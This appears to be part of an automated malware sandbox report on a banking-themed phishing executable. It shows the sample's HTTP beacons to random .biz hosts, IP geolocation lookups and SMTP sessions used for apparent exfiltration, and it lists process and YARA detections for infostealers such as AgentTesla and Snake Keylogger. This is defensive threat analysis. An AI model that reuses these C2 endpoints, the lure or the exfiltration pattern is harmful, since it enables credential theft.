                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                      Content-Length: 784
                                                                                                                                                      Nov 28, 2024 18:27:13.360536098 CET784OUTData Raw: ce 06 5a d6 a9 4f 33 75 04 03 00 00 ca 4a 3c a9 b9 d5 16 d9 7e 81 78 98 18 b2 a5 1b c6 a1 b4 5d 6a ef ef a7 36 71 08 87 56 73 c5 1f 2c 4e 26 60 af 21 09 7d 39 31 00 41 cf 28 55 7d 33 c3 c9 7b 69 02 e0 f8 bc 9f 73 ce 92 60 40 75 9e 64 2b 9b 0e 60
                                                                                                                                                      Data Ascii: ZO3uJ<~x]j6qVs,N&`!}91A(U}3{is`@ud+`KSc'-U:(ncl7a/u]j:\PT~x./\#=2v>#,^FRx=Q;V;|z1e]*'CrTm2:-]+
                                                                                                                                                      Nov 28, 2024 18:27:15.435822964 CET411INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 28 Nov 2024 17:27:15 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: btst=98e3ef565d7816f4b9e455329bbd1428|8.46.123.228|1732814835|1732814835|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                      Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      3192.168.2.74975354.244.188.177807848C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Nov 28, 2024 18:27:16.823854923 CET354OUTPOST /yqmdwhskkjhif HTTP/1.1
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Host: cvgrf.biz
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                      Content-Length: 784
                                                                                                                                                      Nov 28, 2024 18:27:16.823905945 CET784OUTData Raw: ee fd 27 13 c2 4e 10 0c 04 03 00 00 dc 16 74 b1 de b4 14 5f eb 58 1b b6 bf e0 c0 52 2a 87 46 cc 7b ba 52 00 57 17 11 1c 2d 10 bf 64 ff 99 a2 f2 91 49 92 60 2e cf 59 7c cf bc 7d 41 c3 54 4c d8 ae c9 ba ff 08 5d aa 6c 38 22 9f 5d 27 62 ac 71 81 92
                                                                                                                                                      Data Ascii: 'Nt_XR*F{RW-dI`.Y|}ATL]l8"]'bql$]j/i0ugC[Q8utwXrg;4*26b<+T5KE9Jp9umA?|JfFfKmUete 8P%A7Cx;fF"-w{^?R2P
                                                                                                                                                      Nov 28, 2024 18:27:18.221394062 CET409INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 28 Nov 2024 17:27:17 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: btst=b0d38fdfc94de4c105f55c6e484af426|8.46.123.228|1732814837|1732814837|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                      Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.749702172.67.74.152443520C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-11-28 17:26:52 UTC155OUTGET / HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-11-28 17:26:53 UTC424INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 28 Nov 2024 17:26:52 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 12
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Origin
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8e9c10c52ca12365-EWR
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1791&rtt_var=682&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1593886&cwnd=154&unsent_bytes=0&cid=31eeccea1930ddc0&ts=606&x=0"
                                                                                                                                                      2024-11-28 17:26:53 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                                                                                                                      Data Ascii: 8.46.123.228


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.749704172.67.177.1344436012C:\Users\user\AppData\Local\Temp\server02.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-11-28 17:26:55 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-11-28 17:26:55 UTC876INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 28 Nov 2024 17:26:55 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 362
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                      Age: 77986
                                                                                                                                                      Last-Modified: Wed, 27 Nov 2024 19:47:09 GMT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5yNHzq7WqjN%2Be7ZaAmATibVDVTxD9t6%2FujdUPTj7IJ8IkTAtfakwtMOhSmoWhHaNY2CB2FarlYOY%2FcjGWCRml6YjD12du1AwWeDGXOkj1Ov6H4UX5pdVJbtCx0MmiQJEQ%2BE3w1KK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8e9c10d38ec7f78d-EWR
                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1466&rtt_var=558&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1945369&cwnd=32&unsent_bytes=0&cid=893826f9c410926d&ts=453&x=0"
                                                                                                                                                      2024-11-28 17:26:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                      Nov 28, 2024 18:26:55.780052900 CET5874970551.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:26:55 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                      Nov 28, 2024 18:26:55.786144972 CET49705587192.168.2.751.195.88.199EHLO 549163
                                                                                                                                                      Nov 28, 2024 18:26:56.198338032 CET5874970551.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:26:56.200108051 CET49705587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:26:56.612540960 CET5874970551.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                      Nov 28, 2024 18:27:02.725837946 CET5874971651.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:27:02 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                      Nov 28, 2024 18:27:02.729738951 CET49716587192.168.2.751.195.88.199EHLO 549163
                                                                                                                                                      Nov 28, 2024 18:27:03.173630953 CET5874971651.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:27:03.188604116 CET49716587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:27:03.599958897 CET5874971651.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                      Nov 28, 2024 18:28:42.193536043 CET5874993051.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:28:41 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                      Nov 28, 2024 18:28:42.193768978 CET49930587192.168.2.751.195.88.199EHLO 549163
                                                                                                                                                      Nov 28, 2024 18:28:42.603873968 CET5874993051.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:28:42.604062080 CET49930587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:28:43.015196085 CET5874993051.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                      Nov 28, 2024 18:28:50.895925999 CET5874995051.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:28:50 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                      Nov 28, 2024 18:28:50.896104097 CET49950587192.168.2.751.195.88.199EHLO 549163
                                                                                                                                                      Nov 28, 2024 18:28:51.358721972 CET5874995051.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:28:51.358891964 CET49950587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:28:51.782428026 CET5874995051.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                      Nov 28, 2024 18:29:37.857738018 CET5874998551.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:29:37 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                      Nov 28, 2024 18:29:37.857985973 CET49985587192.168.2.751.195.88.199EHLO 549163
                                                                                                                                                      Nov 28, 2024 18:29:38.270150900 CET5874998551.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:29:38.270329952 CET49985587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:29:38.684851885 CET5874998551.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                      Nov 28, 2024 18:30:03.749540091 CET5874998651.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:03 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                      Nov 28, 2024 18:30:03.749692917 CET49986587192.168.2.751.195.88.199EHLO 549163
                                                                                                                                                      Nov 28, 2024 18:30:04.165430069 CET5874998651.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:30:04.165564060 CET49986587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:30:04.574337006 CET5874998651.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                      Nov 28, 2024 18:30:06.443813086 CET5874998751.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:06 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                      Nov 28, 2024 18:30:06.445475101 CET49987587192.168.2.751.195.88.199EHLO 549163
                                                                                                                                                      Nov 28, 2024 18:30:06.862308979 CET5874998751.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:30:06.869034052 CET49987587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:30:07.283963919 CET5874998751.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                      Nov 28, 2024 18:30:17.565928936 CET5874998951.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:17 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                      Nov 28, 2024 18:30:17.566201925 CET49989587192.168.2.751.195.88.199EHLO 549163
                                                                                                                                                      Nov 28, 2024 18:30:17.977600098 CET5874998951.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:30:17.988353968 CET49989587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:30:18.397284031 CET5874998951.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                      Nov 28, 2024 18:30:35.806843042 CET5874999051.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:35 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.
                                                                                                                                                      Nov 28, 2024 18:30:35.816112995 CET49990587192.168.2.751.195.88.199EHLO 549163
                                                                                                                                                      Nov 28, 2024 18:30:36.242697001 CET5874999051.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:30:36.243056059 CET49990587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:30:36.612401962 CET5874999051.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:30:36.667963982 CET49990587192.168.2.751.195.88.199STARTTLS
                                                                                                                                                      Nov 28, 2024 18:30:36.996812105 CET5874999051.195.88.199192.168.2.7250-s82.gocheapweb.com Hello 549163 [8.46.123.228]
                                                                                                                                                      250-SIZE 52428800
                                                                                                                                                      250-8BITMIME
                                                                                                                                                      250-PIPELINING
                                                                                                                                                      250-PIPECONNECT
                                                                                                                                                      250-STARTTLS
                                                                                                                                                      250 HELP
                                                                                                                                                      Nov 28, 2024 18:30:37.385895967 CET5874999051.195.88.199192.168.2.7220 TLS go ahead
                                                                                                                                                      Nov 28, 2024 18:30:56.699347019 CET5874999151.195.88.199192.168.2.7220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 17:30:56 +0000
                                                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                      220 and/or bulk e-mail.

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:12:26:45
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
                                                                                                                                                      Imagebase:0x80000
                                                                                                                                                      File size:2'267'136 bytes
                                                                                                                                                      MD5 hash:FA7DCECB3C5AC81610C93C6B91CDA38A
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:2
                                                                                                                                                      Start time:12:26:46
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\bothsided\spadixes.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
                                                                                                                                                      Imagebase:0x8c0000
                                                                                                                                                      File size:2'267'136 bytes
                                                                                                                                                      MD5 hash:FA7DCECB3C5AC81610C93C6B91CDA38A
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1285293466.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:12:26:47
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
                                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                                      File size:46'504 bytes
                                                                                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1295590843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1283416530.0000000008200000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1328426557.0000000008260000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1300865419.0000000005800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                      • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1329059100.0000000008400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:12:26:49
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:1'290'240 bytes
                                                                                                                                                      MD5 hash:911868154988B08BC9EC4AF4D85832D3
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:11
                                                                                                                                                      Start time:12:26:49
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\TrojanAI.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
                                                                                                                                                      Imagebase:0x640000
                                                                                                                                                      File size:231'936 bytes
                                                                                                                                                      MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:12
                                                                                                                                                      Start time:12:26:49
                                                                                                                                                      Start date:28/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\server02.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\server02.exe"
                                                                                                                                                      Imagebase:0x530000
                                                                                                                                                      File size:98'304 bytes
                                                                                                                                                      MD5 hash:D49B97C9900DA1344E4E8481551CC14C
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3712810154.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security
